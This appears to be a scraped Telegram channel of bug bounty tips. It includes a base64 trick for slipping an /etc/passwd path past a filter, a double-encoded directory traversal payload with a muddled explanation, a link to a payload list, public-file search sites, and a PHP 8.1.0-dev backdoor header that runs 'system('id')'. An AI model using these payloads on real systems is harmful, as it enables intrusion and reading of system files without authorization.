Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
Brut Security pinned «Keep Checking Old Posts 🍿»
Is X Bug Bounty Community
Anonymous Poll
38%
Toxic
62%
Great
url/?f=etc/passwd ==> 403
encode etc/passwd as base64

url/?f=L2V0Yy9wYXNzd2Q= ==> 200

#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...

By:@GodfatherOrwa

#bugbountytips #BugBounty
👍10🔥2🤔21
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4
💥2 Days Left for Registration of July Batch: Extreme Web Application Penetration Testing 💥

🚨Classes Starting From- Tuesday 16 July, 4PM INDIAN STANDARD TIME

💯Registration Link- https://wa.me/message/NQLPOBIAEFDBN1

⭕️Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
Please open Telegram to view this post
VIEW IN TELEGRAM
Find public files in Amazon S3
http://s3digger.com

Find public files in Dropbox 
https://drodigger.com

Find public files in Disk Yandex
https://yadigger.com

Find public files in Google Drive
https://drodigger.com

Find public files in other file sharing sites
https://fidigger.com

Find public files on url shortening sites
https://shortdigger.com
👍42
🚨A directory traversal bug in a private Intigrity program.

💥Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd

Courtesy- Click Here
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍4
Brut Security
🚨A directory traversal bug in a private Intigrity program. 💥Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd Courtesy- Click Here
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
👍4
payloads.txt
5.3 MB
Directory-Traversal-Payloads
👍2😁1
Brut Security pinned «💥2 Days Left for Registration of July Batch: Extreme Web Application Penetration Testing 💥 🚨Classes Starting From- Tuesday 16 July, 4PM INDIAN STANDARD TIME 💯Registration Link- https://wa.me/message/NQLPOBIAEFDBN1 ⭕️Join us for an intensive 2-month course…»
Brut Security pinned Deleted message
This media is not supported in your browser
VIEW IN TELEGRAM
Money comes, money goes. Focus on learning.

In the world of bug bounty hunting, it's easy to get caught up in the pursuit of monetary rewards. However, remember that money comes and goes. The real value lies in the skills and knowledge you gain along the way. Every vulnerability you uncover, every system you test, and every report you write contributes to your growth as a cybersecurity expert. Prioritize learning and honing your craft, and the financial rewards will naturally follow. Stay curious, stay dedicated, and let your passion for learning be your true guide.

Thanks,
The Brut Security Team
👍12💯21
Complete Guide on Attack Surface Discovery 🔍

Check out our latest article detailing the steps a cybersecurity researcher can follow to construct an Attack Surface using Netlas.io and other tools. Don't miss it! 🔥

👉🏻 Read now: https://netlas.io/blog/attack_surface_discovery_guide/

❗️Netlas' blog is now available at netlas.io/blog❗️
👍3
😉💖
🔥131👍1
🔥14💯54
📌Targeted Scanning with Burp Suite: A Regex Pattern for example.com

As a penetration tester or bug bounty hunter, it's essential to focus your scanning efforts on the specific domains and subdomains that matter. In this post, we'll explore a regex pattern that helps you target the example.com domain and its subdomains in Burp Suite, and how to combine it with powerful tools to get more fine-grained results.

💵The Regex Pattern:
(^|^[^:]+:\/\/|[^\.]+\.)example.*



🛍Let's break down this pattern:

(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.

([^\.]+\.): Matches the subdomain (if any) before the main domain example.

example: The main domain name, replaced with example in this example.

.*: Matches any characters (including none) after the main domain name.


🛍This pattern will match any URLs that contain the domain example and may include:

Protocols like http:// or https://

Subdomains like sub.example or foo.bar.example

Paths and query strings like /path/to/resource?param=value


❗️Using this Pattern in Burp Suite:

✔️Add this regex pattern to the "Add Scope" section in Burp Suite to specify the scope of URLs that Burp should target. This will help Burp focus on the specific domain and its subdomains, and ignore other unrelated URLs.

❗️Combining with Powerful Tools:

✔️To get more fine-grained results, combine this regex pattern with the following tools in Burp Suite:

1.Burp JS Link Finder: Finds JavaScript files and links on the target website.

2.Paraminer: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.

3.Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.

4.Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.

5.SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.



⚡️By using this regex pattern and combining it with these powerful tools, you can perform a more targeted and efficient vulnerability scan on the example.com domain and its subdomains.

☄️Happy Hunting!☄️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👏2
Find a server running PHP 8.1.0-dev
🚨 Check for easy RCE 🚨

👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbountytips #bugbounty
👍8🥰2